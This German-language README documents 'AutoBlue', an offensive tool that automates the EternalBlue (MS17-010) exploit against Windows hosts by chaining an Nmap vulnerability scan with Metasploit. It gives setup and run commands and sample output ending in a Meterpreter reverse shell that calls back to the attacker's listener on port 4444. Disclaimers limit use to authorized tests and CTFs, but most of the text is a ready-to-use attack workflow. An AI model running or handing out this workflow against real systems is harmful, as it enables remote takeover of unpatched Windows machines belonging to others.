
AutoBlue – Automatisiertes EternalBlue-Exploitationstool (CVE-2017-0144 / MS17-010), das Nmap und Metasploit für ethisches Hacking, Penetrationstests und CTF-Herausforderungen nutzt. Ausschließlich für autorisierte und Bildungszwecke bestimmt!
AUTOBLUE ist ein Automatisierungstool, das dazu entwickelt wurde, die EternalBlue-Sicherheitslücke (CVE-2017-0144) auf Windows-Maschinen auszunutzen. Das Tool vereint die Leistungsfähigkeit von Nmap für die Schwachstellensuche und Metasploits msfconsole für die Ausnutzung, sodass Benutzer automatisch anfällige Systeme identifizieren und den EternalBlue-Exploit starten können, um Fernzugriff auf das Ziel zu erhalten.
Dieses Tool wurde in erster Linie für Sicherheitsexperten, Penetrationstester und ethische Hacker entwickelt, die in kontrollierten, autorisierten Umgebungen wie Capture-The-Flag (CTF)-Herausforderungen, Penetrationstest-Einsätzen oder Laborumgebungen arbeiten. AUTOBLUE ermöglicht es Benutzern, die EternalBlue-Sicherheitslücke mit minimalem manuellem Eingriff auszunutzen, indem sie einfach die Ziel-IP-Adresse eingeben.
Funktionen
Automatisierte Schwachstellensuche: Verwendet Nmap, um auf der Zielmaschine nach der EternalBlue-Sicherheitslücke (CVE-2017-0144) zu suchen.
Nahtlose Ausnutzung: Nutzt Metasploits msfconsole, um den EternalBlue-Exploit automatisch zu starten.
Einfache Einrichtung: Erfordert lediglich eine Ziel-IP-Adresse und eine funktionierende Umgebung mit installierten Nmap und Metasploit.
Ausgabebericht: Erzeugt eine Ausgabe, die den Erfolg oder Misserfolg des Exploit-Versuchs anzeigt.
Inhaltsverzeichnis
Voraussetzungen
Installation
Verwendung
Funktionsweise
Sicherheitshinweise
Mitwirken
Lizenz
Danksagungen
Haftungsausschluss
Voraussetzungen:
Bevor Sie AUTOBLUE verwenden, stellen Sie sicher, dass die folgenden Tools auf Ihrem System installiert sind:
Nmap: Ein Netzwerkscan-Tool zur Erkennung anfälliger Maschinen.
Metasploit Framework: Eine Penetrationstest-Plattform, die Exploits für EternalBlue enthält.
Nmap installieren:
Code kopieren
sudo apt update
und
sudo apt install nmap
Unter Windows oder macOS laden Sie Nmap von der offiziellen Website herunter.
Metasploit installieren:
Unter Linux (Debian-basiert):
Code kopieren
sudo apt update
und
sudo apt install metasploit-framework
Unter Windows oder macOS laden Sie Metasploit von der offiziellen Website herunter.
Installation:
Um AUTOBLUE zu installieren, führen Sie die folgenden Schritte aus:
Repository klonen:
git clone https://github.com/AtithKhawas/autoblue.git
und
cd autoblue
Stellen Sie sicher, dass Nmap und Metasploit als Voraussetzungen korrekt installiert sind.
Skript ausführbar machen:
chmod +x autoblue.sh
Verwendung:
AUTOBLUE wurde entwickelt, um die Suche und Ausnutzung der EternalBlue-Sicherheitslücke zu automatisieren. So verwenden Sie es:
Um AUTOBLUE zu verwenden, führen Sie den folgenden Befehl in Ihrem Terminal aus:
Code kopieren
./autoblue.sh
Ausgabe:
┌──(root㉿kali)-[/home/Elliot]
└─# ./autoblue.sh
============================================
********************************************
AutoBlue - EternalBlue Exploit Automation
********************************************
********************************************
------------------------Made by ATITH KHAWAS
============================================
Enter Target IP Address:
Es wird nach der Ziel-IP-Adresse und Ihrer gefragt.
Beispiel
Enter Target IP Address: Ziel<IP-Adresse>
Enter Your IP Address: Ihre <IP-Adresse>
Sobald Sie das Tool ausführen, beginnt es mit dem Scan mit Nmap:
Ausgabe-1
Target IP Address: ***.***.**.**
[+] Scanning Target for MS17-010 Vulnerability...
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 12:41 EST
Nmap scan report for ***.***.**.**
Host is up (0.19s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
[+] Target is VULNERABLE to EternalBlue!
Hier beginnt die eigentliche Arbeit, die den zeitaufwändigen Prozess erheblich verkürzt. Wenn das Ziel anfällig ist, startet es automatisch die Msfconsole und setzt RHOSTS, PAYLOAD, LHOST und LPORT mit dem Standardport 4444.
Ausgabe-2
[+] Launching Metasploit...
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
RHOSTS => ***.***.**.**
PAYLOAD => windows/x64/meterpreter/reverse_tcp
LHOST => ***.***.**.**
LPORT => 4444
[*] Started reverse TCP handler on ***.***.**.**:4444
Und liefert uns die Meterpreter-Shell des Ziels.
Ausgabe-3
[+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > pwd
C:\Windows\system32
Funktionsweise:
Nmap-Skript-Scan: Das Tool verwendet zunächst einen Nmap-Skript-Scan (--script smb-vuln-ms17-010), um zu erkennen, ob die Zielmaschine anfällig für den EternalBlue-Exploit ist. Es überprüft, ob Port 445 geöffnet ist, und versucht, SMB-Schwachstellen zu identifizieren.
Metasploit-Exploit: Wenn die Zielmaschine als anfällig erkannt wird, startet AUTOBLUE den EternalBlue-Exploit mithilfe von Metasploits msfconsole. Das Skript konfiguriert und sendet die erforderliche Payload, um die Schwachstelle auszunutzen.
Reverse Shell: Bei erfolgreichem Exploit wird eine Reverse-Shell geöffnet, die eine Befehlszeilenschnittstelle auf dem Opferrechner bereitstellt.
Rückmeldung: Das Tool gibt während des gesamten Prozesses Rückmeldungen, einschließlich der Information, ob das Ziel erfolgreich ausgenutzt wurde, und gibt relevante Informationen aus (z. B. IP-Adresse der Reverse-Shell).
Sicherheitshinweise:
Rechtmäßige Nutzung: Dieses Tool sollte nur in autorisierten Umgebungen verwendet werden. Stellen Sie sicher, dass Sie die ausdrückliche Erlaubnis haben, die Zielmaschine zu testen, und dass dies in Ihrer Gerichtsbarkeit nicht illegal ist.
Benutzereingabe: Stellen Sie sicher, dass nur vertrauenswürdige IPs in das Tool eingegeben werden, um Missbrauch zu verhindern. Das Ausführen dieses Tools auf nicht vertrauenswürdigen Systemen kann zu Sicherheitsvorfällen führen.
Payload-Sicherheit: Die in diesem Tool verwendete Reverse-Shell-Payload ist von Natur aus riskant. Setzen Sie die Angriffsmaschine oder ihre Listener keinen nicht vertrauenswürdigen Netzwerken aus.
Abhängigkeiten aktualisieren: Aktualisieren Sie Nmap und Metasploit regelmäßig, um bekannte Sicherheitslücken in diesen Tools zu beheben.
Mitwirken:
Beiträge zum AUTOBLUE-Projekt sind willkommen. Wenn Sie Vorschläge, Verbesserungen oder Fehlerbehebungen haben, können Sie das Repository forken und einen Pull-Request erstellen.
Lizenz:
Dieses Tool ist Open Source und unter der MIT-Lizenz veröffentlicht. Sie können die Software in Ihren eigenen Projekten frei verwenden, modifizieren und verbreiten. Sie müssen diesen Hinweis jedoch in allen Kopien oder wesentlichen Teilen der Software beifügen.
Danksagungen:
Nmap: Für die Bereitstellung der wesentlichen Schwachstellensuchfunktionalität.
Metasploit: Für die Bereitstellung des Frameworks zur Ausnutzung der EternalBlue-Sicherheitslücke.
Sicherheitsforscher: Für die Entdeckung und öffentliche Offenlegung der EternalBlue-Sicherheitslücke, die dazu beigetragen hat, Systeme weltweit zu sichern.
Haftungsausschluss:
AUTOBLUE ist ein Tool, das nur für Bildungs- und ethische Zwecke bestimmt ist. Die Autoren übernehmen keine Verantwortung für illegale Handlungen, die mit diesem Tool durchgeführt werden. Es liegt in Ihrer Verantwortung, sicherzustellen, dass Sie die ausdrückliche Erlaubnis haben, Penetrationstests an einem System durchzuführen.
Verwenden Sie dieses Tool auf eigenes Risiko. Führen Sie Penetrationstests immer in einer sicheren und legalen Umgebung durch.